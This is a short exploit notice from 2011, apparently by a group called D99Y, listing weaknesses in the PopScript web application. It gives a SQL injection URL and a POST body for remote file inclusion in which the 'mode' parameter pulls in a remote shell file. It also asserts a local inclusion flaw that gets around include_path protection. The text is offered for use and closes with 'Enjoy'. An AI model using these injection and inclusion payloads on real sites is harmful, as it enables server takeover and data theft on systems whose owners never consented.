# Exploit Title: PopScript Multiple Vulnerabilities
# home : http://www.D99Y.com
# Google Dork: Do as you would be done by ; )
# Date: 5/6/2011 
# Author: NassRawI
# Software Link: http://www.popscript.com/
# [1] SQL injection
# http://localhost/PopScript/index.php?act=inbox&mode=1 [ SQL injection ]
# [2] File inclusion = require() 
# Remote File inclusion :
# exploit  :
# send in index.php  [ post ]
# email=r...@d99y.com&mode=[Shell txt]?&password=nassrawi&remember=ON
# Local :
# exploit  :
# send in index.php  [ post ]
# You can skip protection include_path  ; )

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D99Y Team and all members D99Y.CoM

Enjoy ; )

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